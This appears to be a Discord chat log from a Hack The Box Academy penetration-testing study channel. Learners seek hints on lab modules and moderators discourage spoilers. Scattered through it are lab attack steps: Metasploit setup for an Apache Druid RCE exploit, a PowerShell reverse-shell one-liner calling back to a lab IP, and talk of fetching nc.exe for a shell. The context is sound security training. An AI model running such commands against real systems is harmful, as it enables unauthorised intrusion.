For me it's gonna be either to use .net in memory on a .net process or the native api and indirect syscalls using C...

But that's assuming you're gonna do red Teaming and not just pentesting with zero evasion

Could someone give me a nudge in "Skills Assessment - Password Attacks" ?
Really ran out of idea from jump01 to dc01.

hi I'm working through the AD Enumeration and Attacks Module and I'm done with section 11 and I am wondering how long does it take most people to work through the module? I'm making sure to get good notes on every single section so as not to rush through it.

I heard some people say it took them like two months. I've been at it for like a week or two and I'm 11 sections into it.

actually its been around 2 weeks

I don't need help with the module currently I just want to ask how long it took you to complete it. I completed pivoting, tunneling and port forwarding on June 19th and then a couple days later started AD module so its been almost 3 weeks.

the actual section exercises aren't difficult but I do a lot of note taking to make sure I understand the whole thing

the actual flags so far are not hard, tho I imagine the skills assessment will be difficult

No one can know how long it takes everyone on average. People only know how fast they completed it. It also depends on how many hours you're putting in, etc. I completed the entire path in just over 4 weeks for example, but I also worked on it like 8+ hours a day.

I've heard ranges for the entire path, but not AD. The ranges I've heard for the whole path is anywhere from 1 month to 12 months.

Frankly I don't think it matters at all, what matters is you understand the content.

I know it doesn't matter. I'm not referring to the whole path. I'm referring to the AD Enumeration and Attacks module.

which is one module in the path

No one knows. How can anyone know the average time it takes for everyone as a whole?

and the reason I'm asking is because

people say its the longest module in the CPTS path and

its one of the hardest so I am just curious. People are saying it took them two months. At the rate I'm going it will be 1.5 months for this module.

but I'm wondering does the CPTS path start to get easier after AD Enumeration and Attacks like everyone says? I know it starts to get into web hacking after that.

i don't think it was one of the hardest

well, its not too difficult to me so far

I already had vast knowledge of AD due to my IT experience

the exercises and flags have been easy. people are saying its the longest module.

it might be longest in terms of content, either that or aen i'd imagine

ya ok

but like is it the most tedious module? it certainly has the most sections

that's subjective

i found modules like metasploit, getting started, vuln assessment, etc to be more tedious

I mean maybe your right. I found the pivoting, tunneling, and port forwarding module to be harder

I mean I am having an easier time getting through this module than previous ones but its more sections to complete if you get my drift

so like for someone who's first real exposure to learning pentesting is CPTS, would you say it could be tedious?

yeah but completion rate is going to vary by people. difficulty is going to be subjective.

tedious is going to be subjective too.

I know I'm just trying to get a general consensus and see if it matches up with my viewpoint and what the different viewpoints are

i enjoyed it a lot

its a fun module ya

I found the pivoting, tunneling, and port forwarding module to be exponentially harder tho

if you're describing it as fun then it's not tedious to you

albeith shorter

I guess tedious is the wrong word

its fun material but maybe takes longer to complete

altho I have gotten through it much more quickly than previous modules

part of that is little health improvements I have been making

and that I have had a good couple months

I guess I'm just curious why I keep hearing people say it took them two months to get through the module

I can see myself taking one and a half months to get through it at the current rate but two feels like a stretch

My guess would be because they don't spend a lot of time studying

ok

well, for me its been two weeks maybe two and a half and I'm on section 12

so that translates to a little over a month for me to complete it if we assume skills assessment will take longer

and if we take the 36 sections into account

ty

is the answer for Introduction to BASH Scripting outdated?

Conditional Execution
"Create an "If-Else" condition in the "For"-Loop of the "Exercise Script" that prints you the number of characters of the 35th generated value of the variable "var". Submit the number as the answer."

There's no ssh suggestion but the answer seems to be wrong when I don't ssh or when I do. There's no suggestion to ssh or an ip to ssh into so I am under the impresssion I just open the pwnbox and do the qustion as is. I've tried multiple answers using multiple commands and even asked chatgpt and it seems to have gotten the same answers haalp. Same thing that happend to me with the Linux fund. aswell

@real trout no one is gonna give you the answer. You're expected to copy/paste the given script and then modify it to create the conditional

Yes. There's no ssh option, because a target isn't required, just a bash terminal

There's enough information in the reading to get you started

I'm asking if the question is outdated or if I am doing something wrong. I can dm you the script I am running and the answer and you can just tell me if I am doing the wrong syntax. You don't have to give me the answer I just want to make sure

Well, and a text editor

Question isn't outdated

My dms aren't open atm, about to head to bed

so you know the question isn't outdated for sure cause you checked or?

Whats the question?

^

night @fathom pendant

under conditional__Q__

Because there hasn't been a significant enough change to the bash scripting language for the module to suddenly become outdated

Oh is this the Intro to Linux module?

Aka Linux fudmentals?

Nope, intro to bash

I ran into similar issues in Linux fund. under the impression I am running the correct commands but not sure

Intro to bash ya

Linux fundamentals isn't outdated either

Oh lmao not sure I fry my brain on trying to pivot and password attack module

So I am catching some sun Rays

where to provide modules related machine feedback?

is there a staff or mod that's down to just see if I am running the correct syntax?

normally it's after you complete the course I believe unless you're talking about here in the cord

review isnt feedback mate

Or just someone that's done the module. You don't exclusively need staff or mods to help

Use the syntax provided in the exercise script to count the length @real trout; it's likely GPT is leading you astray

The AI hallucinations ohno

#1234357888114364508

There's many making feedback today

If you believe it's errors: #1234357888114364508

Otherwise you can do /feedback

its more like an idea for making ux better for learners. should i use erratum or /*feedback?

If there's not an appropriate tag for the post in #1234357888114364508 ; then /feedback would be better

LLM output attacks?

@real trout i suggest not using AI as much as possible when learning the fundamentals

Ahhh idk not mess with AI, learn through mistake and trials

ok np 🙂 I thought you mightve been doing to LLM output attacks module

Bit time consuming bit 100% worth it

Nope I'm getting fried on Pivots and Password Attacks, just started AD Enumeration and Attacks but that 1 looks more painful then the current 1s I am doing...

Doing ADs? Good luck bro

Yeah I know seems painful and still on the intro part of it hahhaha

Is it just me or is ptunnel really janky

I'm doing the pivoting module and just building this damn thing was already complicated for no reason, now I have to restart it and my ssh dynamic port forward all the time to get it to work

hii

not even sure what you're asking but here is definitely not the place to ask

check dm

Ended up using a different pivoting method than ptunnel, I keep getting:
[inf]: Packet discarded - outside receive window.

Who let the Diddy out to party ?!?!?!

Hahahahahahaha

In "Attacking common applications" in the "Thick client applications" I don't understand hardly anything im doing, im just walking through it, how can I get to understand what im doing? Or are we meant to just have that walktrhough in our notes and hope that in the examn it is presented in the same way

for those who have done the Using the Metasploit Framework module - Payload section, have you gotten this error for the questions?

[*] 10.129.89.114 - Meterpreter session 2 closed.
[*] Sending stage (3045380 bytes) to 10.129.89.114
[-] Meterpreter session 3 is not valid and will be closed
[*] 10.129.89.114 - Meterpreter session 3 closed.

It doesn't mention that kerbrute is on /opt, it says jsmith.txt is

Your set payload is either not compatible or not the same as the one you set in your msfvenom

Sorry, I dont understand. Do you mean like my set RHOSTS?

Hi guys , i hope everyone is fine , I have one question from BURP

https://academy.hackthebox.com/module/110/section/1056

The directory we found above sets the cookie to the md5 hash of the username, as we can see the md5 cookie in the request for the (guest) user. Visit '/skills/' to get a request with a cookie, then try to use ZAP Fuzzer to fuzz the cookie for different md5 hashed usernames to get the flag. Use the "top-usernames-shortlist.txt" wordlist from Seclists.

okay i even find username but how can i got the flag ?

I did an Nmap scan and found that the Apache Druid 0.17.1 service is running at port

$ nmap -sC -sV -Pn 10.129.203.52
Starting Nmap 7.95 ( https://nmap.org ) at 2025-07-09 14:23 WIB
Nmap scan report for 10.129.203.52
Host is up (2.1s latency).
Not shown: 995 closed tcp ports (reset)
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 71:08:b0:c4:f3:ca:97:57:64:97:70:f9:fe:c5:0c:7b (RSA)
|   256 45:c3:b5:14:63:99:3d:9e:b3:22:51:e5:97:76:e1:50 (ECDSA)
|_  256 2e:c2:41:66:46:ef:b6:81:95:d5:aa:35:23:94:55:38 (ED25519)
8081/tcp open  http    Jetty 9.4.12.v20180830
| http-title: Apache Druid
|_Requested resource was http://10.129.203.52:8081/unified-console.html
|_http-server-header: Jetty(9.4.12.v20180830)
8082/tcp open  http    Jetty 9.4.12.v20180830
|_http-server-header: Jetty(9.4.12.v20180830)
|_http-title: Site doesn't have a title.
8083/tcp open  http    Jetty 9.4.12.v20180830
|_http-title: Site doesn't have a title.
|_http-server-header: Jetty(9.4.12.v20180830)
8888/tcp open  http    Jetty 9.4.12.v20180830
|_http-server-header: Jetty(9.4.12.v20180830)
| http-title: Apache Druid
|_Requested resource was http://10.129.203.52:8888/unified-console.html
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 61.38 seconds

And I use this payload module (index 0):

msf6 > search apache druid

Matching Modules
================

   #  Name                                            Disclosure Date  Rank       Check  Description
   -  ----                                            ---------------  ----       -----  -----------
   0  exploit/linux/http/apache_druid_js_rce          2021-01-21       excellent  Yes    Apache Druid 0.20.0 Remote Command Execution

Based on the options all I need to set are just:

msf6 exploit(linux/http/apache_druid_js_rce) > set RHOSTS 10.129.89.114
RHOSTS => 10.129.89.114
msf6 exploit(linux/http/apache_druid_js_rce) > set RPORT 8081
RPORT => 8081
msf6 exploit(linux/http/apache_druid_js_rce) > set LHOST xx.xx.xx.xx
LHOST => xx.xx.xx.xx

how did u send photo cuz i cant

those aren't photos. They are codes.

Use backticks three times and end it with another 3 backticks, paste your code in between it

Hope you got it, but just in case, as a note, for some of the modules you need to only use the exact syntax as shown in the section. Any deviation/googling for other ways may in fact give you an answer that HTB wont accept.

ty I'll try again tomorrow haha

No one can help with this sorry, also this is not the place so please don't spam.

phishing link

It's not a phish, that is just how instagram formats share ID in the url

i thought it was by the way the guy was spamming

Fair assumption! Especially as instagram does/did have open redirect vulns

Anybody got an idea what I did wrong here?

Probably the wrong type of payload. For example using an x64 shell payload instead of x86 or vice versa. Play around with the options and see what sticks

hmm

type's good

@split frost - no

not relevant to this server

when running EyeWitness I receive this error

Message: Process unexpectedly closed with status 1

I belive it occurs because an issue with the selenium.
Did someone have the same issue and managed to resolve it ?

can anyone help with second question in using crackmapexec skills assess Gain access to the SQL01 and submit the contents of the flag located in C:\Users\Public\flag.txt.

is their any other way that I can do my Penetration Testing without the VM

If you are referring to the provided workstation, yes, you can use your own VM. However, you must be connected to the VPN to do the specific exercises

fixed

hey im working on the second skill assessment within the AD module im trying to rdp into MS01 using the Admin' hash , but it says account restrictions preventing sign-in (blank password) eventho i have modifed the reg key

You don't have to use dehashed

I remember trying to download it and it turns it maybe its for a price so i figured i probably can solve it without it and that was the right thinking

hi , i have a problem with a question What type of message does a client send to accept an IP address from a DHCP server? , Studing the topic , the answere is DHCP Acknowledge but every time there is a error "incorrect answere"... can you help me ?

i pass

is request

any help please guys, in the module SQLMap Essentials (SQLMap Overview) and the question is What's the fastest SQLi type? but i cant seem to get the answer right. it could just be a formatting problem (normally is) but im stuck

send the question ,maybe I can help you

thanks, sent

Hi, need some assistance
Module: Network enumeration with nmap
Section: firewall evasion, hard lab
Im at the final stage, every command has worked right only the last command for nc isnt
What could i do?

specify source port (-p) with nc

I did, but its still gave me the error that address is being used, but its alright, i found a way around it and got the flag

dnsmasq is likely running

Yep it was

Had to kill it

Hi, i have the Same Problem. Did you find any Solution?

❤️

thanks

@rain hawk please don't just share answers

it was supposed to be in a vm

thankyou

Ok

Hello, i’m on Password Attacks module in the section skill assessment, i managed to find the first user and i can now access to the DMZ with ssh, i found the username of the second user in the DMZ but not the password, i tried to pivote to File01 because i found something related to this machine but i can’t ssh or nmap to file01 or jump01 even with proxychains, can someone please help me please ?

ssh isn't the only connection method

how can you see ? it’s impossible for me to nmap through the proxychains, even the dmz can’t ping other machines

well for 1: proxychains and icmp don't get along too well

and for 2: nmap isn't the only tool you can use to sweep; nxc is good at checking passwords and protocols (for instance)

oh okay thanks i’ll try it i didn’t know

im stuck in one module tbh

use discord search feature to look for posts/solutions in this channel

having issues with the lateral movement module - netexec doesnt seem to like rdp very much and it just hangs. I have tried debugging - looks like others have had the same behaviour online (github issues)

I managed to get a reverse shell by appending “Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.172 -Port 9443” However, there was no privilege escalation with this shell (I stayed as user htb-student). [Windows Privilege Escalation -> Vulnerable Services]

i get access denied for Set-ExecutionPolicy Bypass -Scope Process

Hey fellow learners. I have a question about CVE scoring for reports - I have an application with already assigned CVE and score attached to it. In the reporting should I just take over that score as a general one or should I recalculate CVE score depending on the impact of the specified usage of the vulnerability? Say there is a CVE with score 10, but judging from environment usage of that vulnerability objectively for that situation would score max 5 or 6, should I take over the original scoring or apply my own?

who can help me for a question

it should

filtered doesn't necessarily mean it's closed

it generally means packet accepted: but no response (typically because a connection may have timed out)

i just followed it as shown when i did it ¯_(ツ)_/¯

i don't recall running into issues

but as i said

filtered isn't closed

don't make assumptions without verification

ip route would show

but if you're able to reach and get that filtered state, then it's routed properly

Not the right channel but I will give my 2 cents. The CVSS score always has to be checked to suit the environment/application you are testing on. I can give you a concrete example. Let's say a certain CVE exploit requires login credentials to work, but in your case, the same application, now hosted on your target's network allows you to login without credentials.
While the CVSS score for that CVE would have either Low or High Privileges Required, in your case it would have None so you'd have to recalculate for that.

Thanks a lot for the answer. It's just that this part is completely missing in documentation module and I think it would be great to have something so critical for reporting included in it.

I experience this when there is no running RDP actually. Maybe
Confirm with nmap or any other rdp tool

its definitely running. the module is fiocused on rdp and i have rdp in with gui

i tried your advices and i tried nxc to scan importants ports on file01 and jump01 manually and with a script and nothing is open i don’t understand what i am missing, i just have 1 user on the first machine it’s very frustrating tho i found the « hint » of the user hw****** it’s very frustrating

History can be an important subject

Can you send
Nxc -v

if it would contain spoilers please take to dms ❤️

if it’s to find the user hw … i did found him 😦 but i don’t know what’s next

different internal services are available

Good morning all, I'm looking for a little help with "Skills Assessment - Web Fuzzing" > Question 2 (fuzzing extensions). I've added the subdomains found in question 1 to /etc/hosts but my answer isn't being accepted.
I did get question 1 correct so I know I found all the subdomains.

the extensions are expected in .ext1 .ext2 .ext3 format

don't forget to fuzz it as /indexFUZZ with the extension list

I did this. I only found 2 extensions though so I'm thinking I did something wrong. I did individually fuzz each of the found subdomains plus the root (:PORT/indexFUZZ)

there should be more than 2

I'm stumped then. I know I found all of the subdomains since I got question 1 correct. Then I fuzzed them all and only got 2 results 🤔

what module is this again? 'Web Fuzzing' isn't the module that this q is from

Skills Assessment - Web Fuzzing

I ran through the Page Fuzzing module and my notes again but nothing stood out.

link the module

Ah, sorry its - Attacking Web Applications with Ffuf > Skills Assessment - Web Fuzzing
https://academy.hackthebox.com/module/54/section/511

hey everyone! is it allowed to ask for a nudge for skill assessment here?

ah attacking web apps give me a sec to see if I can spin up and get stuck give me a sec

Hi guys, I need a bit of help with the password attacks module, module/147/section/1334. I’ve been stuck for quite a while and I can’t find the domain administrator’s password. I’ve used all the keywords mentioned in the module and checked the file extensions... any help would be appreciated, please.

Jesus that "Exploiting Web Vulnerabilities in Thick-Client Applications" is such a headache, please tell me that is not in the CPTS exam

@jolly oasis i had no issues with spinning up a target and finding the right extensions. f* revealed all

i used the web-extension.txt from seclist

Dang, that's the exact same wordlist I used

But I only get 2 extensions

hey how do i upload screenshot here?

1. Follow #welcome
2. Dont post screenshots w/spoilers for modules above t0

Can I PM you some details? I don't want to end up posting spoilers.

uh sure, normally i wouldn't but i'm curious

Sent

@cobalt lichen please avoid spoilers

sorry did i post spoiler? but i already covered it

even if you spoilered the image, anyone can still click and view

consider anything you have to find or discover a spoiler

Oh

It's hard for me to describe my problem without showing it

what count as spoiler here? because ive seen many screenshots in the chat

Anything that you have to find or discover in a skill assessment or module content above tier 0

oh thanks, i didnt know that

I feel so dumb being stuck in the active directory lab Part 1. Just can't find where to go on the VM to get to AD to add users 😭

Hi, what I have to do when I face an unreachable target in a module ? (I tried several VPN configurations)
Do I have to report it on the website ?

what is the difference between cd .. and cd -

Looking for some help on Attacking Common Services | Attacking FTP

Ran my nmap scan, found where FTP was open. I was able to login, and found some files. Used nxc to figure out what user and password would work. For the "What username is available for FTP" question - neither the user I logged in with nor the user I found within FTP are correct? Please @ with responses

@trim pivot Please do not post content from modules above tier 0, especially skill assessments. You are revealing attack paths.

Hi! How can I ask for help without explaining what I've already tried? I feel like sharing the steps I've taken is necessary to avoid confusion and get accurate help. Is there a specific channel or user I can talk to about my progress on this module/question?

Just specify module and section you are working on and try to talk in a more neutral way as more as possible

You are on hackers server and I don't think that anybody here will walk to your link

that looks like a malicious one

<@&861185840277487616>

Very stupid guy was here

Hi everyone,

I'm working on the DACL Attacks I – Skills Assessment module and ran into an issue with the question:

"What's the content of the flag located at C:\Users\Administrator\Desktop\flag.txt?"

I’ve followed the necessary steps to escalate privileges, but I'm stuck at the point where I try to grant access over MicrosoftSync. I keep getting an error that seems related to the user or group not being found.

I’m not sure what’s causing it, and I’ve been stuck here for a while — any help or guidance would be really appreciated.

Thanks in advance!

so in simple terms cd .. takes you to the parent directory
cd - takes you to the directory you were before

so if i was in directory ~/projects and i did cd bank/data
and i run cd .. i will only go to parent dir which would be bank
but if i did cd - then i will go the directory i was before running the command which would be ~/projects

why im getting this error

I can't say I know enough, but in the error it has verifyCTL and you have verifyctl --> maybe case sensitive?

nah i think its not the right option maybe

hey everyone. i just tried to use ligolo-ng for pivot and still have error. however now if i try dig @<DC_IP> _ldap._tcp.pdc._msdcs.example.htb SRV then i get and answer from it

Further, went and brute-forced with both nxc and hydra, got nothing

when I ran nxc previously it was set on smb not ftp --> can't find anything now, I'm a bit lost and confused

Your error message says DNS resolution error

HI all I'm on PT path > Getting started > Next Step
"Now that we have finished this module, we should be ready to start working on our next steps .......Having completed one easy box as part of this module.....Choose a retired box rated Easy and root the box..."

Than It says get root on Medium box, but, where is the box? should I go to homepage and get into Labs/Boxes ?

Did you do the Knowledge Check?

Not yet

I think that's what you want

On the Knowedge check I have same question like the Nibbles chalange I already done
But I read again the describe. "Now when you get root on easy machine. let get root on Medium machine" something like that.. almost is want me to look for some machines outside this module, and lets say Im right, only easy machine from retired box is "blue"

and for some reason it cost more money

Is it normal to see evidence of another user while working on a machine? Im very new and working on artificial. I had a listener up on a port and randomly got a response from an IP I didn't recognize. I did an nmap on it and its running through openvpn.

Hi Guys,
I'm in the same situation now and have been stuck in the middle of AEN Blind for a couple of days. I don't want to look at the walkthrough because of the spoilers but I just can't figure out what I'm missing. Feels like it's something fundamental or a gap in my methodology. I've already gone through all my notes and the course material, but I'm still stuck. Anyone willing to DM?

oh wow, you dug something up :) It's been a while for me but feel free to DM and I'll try to help, but maybe others will offer too

I've now reset the target twice, once ftp wasn't running now it is, and the brute-force for credentials failed again.... I'm extremely lost, this seems like potentially something wrong with the lab? Can someone confirm?

I'm working on Windows PrivEsc - Print Operators. The target doesn't live for very long. I am able to RDP and a few minutes later the connection is closed. ping stops working.

dms? i was having issues with it earlier too, i may be able to help

No form whatsoever even works properly on the sqlmap essentials skills assessment, I am not sure what else to look for because there are no parameters and all forms don't even function.

Keep looking and review some of the content. If you still have an issue, you can DM me

cry0l1t3@MyVPS:~$ ssh-add ~/.ssh/cry0l1t3, its meant to be run in the host right?
was just a bit confused when i read that in the tutorial or its me that didnt get it,, its in the /module/87/section/3667

Oo kk

Hey for the Windows Privilege "Miscellaneous Techniques". How long does Snaffler take? or is doing that necessary ? from my understanding im supposed to look for backup files

NVM i got it. The answer is yes Snaffler is not necessary for this one

I get nightmares when people mention snaffler

https://tenor.com/view/sweats-gif-25346666

Hi everyone! I'm working on the Pivoting & Port Forwarding section "RDP and SOCKS Tunneling with SocksOverRDP"

But when I run regsvr32.exe SocksOverRDP-Plugin.dll, this happen:

Someone could give me a hand please?

is the file still there?

yeah

wait...

my brother or sister or...idk sorry

there is no dll file there

But... Y extracted the zip file, it should be there but... that not the case it seems

It's almost as if something big and blue is wiping things out

but where could I get that dll file?

because under SocksOverRDPx64.zip is just that server.exe

no dll file

maybe check the hint?

but the hint is about defender (on the 172.16.6.155 I suppose)

send dm no need to clutter here 🙂

and lay out what you've tried so far in the dm ^

sure thanks!

hey which account are we supposed to find the cleartext password for the misceleanious techniques module in Windows Module. It says find the cleartext password for a account. I used Hashcat on all the accounts dumped and neither worked. There were only two anyways

Wish I knew! Not that far yet only in AD

Hey if anybody has done the misceleanious techniques module in Windows Priv Escalation Module, which account is the question referring to? i have the hashes for all but none work as the answer

Does anyone know if there is a way to add time to your target system in the modules? That keeps expiring on me before the attack box. And when it expires I have to update /etc/hosts.

Anyone else cruise right through the modules, no problem, no hints, then get stuck on the Skills Assessments for 3 days? 🤣🤣

Can anyone help me on how to grab the banner with netcat

I put netcat (target) 22 but I keep getting lookup failed

@runic fog make sure the target is up, check the vpn also if running on a vm, and maybe also see if there are any flags that might help your command, always check the man pages of any tool(netcat) you use to get familiar with the tool if there is a man page available.

I reseted and terminated the instance and target but nothing changes

remove the :52170

and remove the 22, put the port where the 22 is

hi its the footpriting module and the ipmi section i only have a hash how can i turn it into real password

crack it?

yes but how ?

hashcat or john?

https://hashcat.net/wiki/doku.php?id=example_hashes

the section you're on tells you the command to use and everything

or at least the mode

Module: Password Attacks
Section: Writing Custom Wordlists and Rules
Question: I'm required to create a custom wordlist to crack the given hash.

I tried generating multiple wordlists, but none of them works, can anyone give me a pointer on what I'm missing?
I'm pretty sure I can't craft a custom list to apply the rules on, so that's exactly where I need help.

Take a look at the table where it says " .. users use the following additions for their passwords to fit the most common password policies:" take the keywords they provide and try to make a list like what's shown in the common table.

still can't figure it out

Module: Password Attacks
Section: Cracking Protected Archives
Question: Mount the BitLocker-encrypted VHD and enter the contents of flag.txt as your answer.

when I try to configure the VHD as a loop device:

sudo losetp -f -P Private.vhd # works fine
sudo dislocker /dev/loop0 -p <password> -- /media/bitlocker # tried both -u and -p for password
sudo dislocker /dev/loop0 -u <password> -- /media/bitlocker

I get this error Wed Jul 9 23:53:19 2025 [CRITICAL] Cannot parse volume header. Abort.
I used sudo losetup -a to see the attached devices and it shows /dev/loop0 so I'm pretty sure of that
also the password is correct, but I don't know how to resolve this issue or what I'm doing wrong.

Module: Attacking Web Applications
Section: Prtg

So, I am trying to achieve command injection via the creation of a custom notification on this module. I don’t want to simply add a user and RDP to it.

That being said, I’ve tried multiple different powershell scripts, as well as base64 encoding them. I’ve also tried downloading NC.exe from an smb server hosted on my machine and then attempting for a reverse shell that way. All to no avail.

Also, I’ve tried using a multitude of different ports

I vaguely remember having trouble with mounting bitlocker as well. I’m pretty sure it had something to do with me running the attacks on my Linux vm rather than the pwnbox. But I’m not sure. All that to say, sometimes the challenges are a bit finicky in how they react to custom attack hosts.

that sucks, it should work on any setup ig

I'm on Network Enumeration with Nmap Firewall and IDS/IPS Evasion - Hard Lab. Would appreciate it if someone could tell me what service I should look for?

got the same error on Pwnbox as well

even tho sudo losetup -a shows /dev/loop0, I need to use /dev/loop0p1
so it's solved

thanks @finite bramble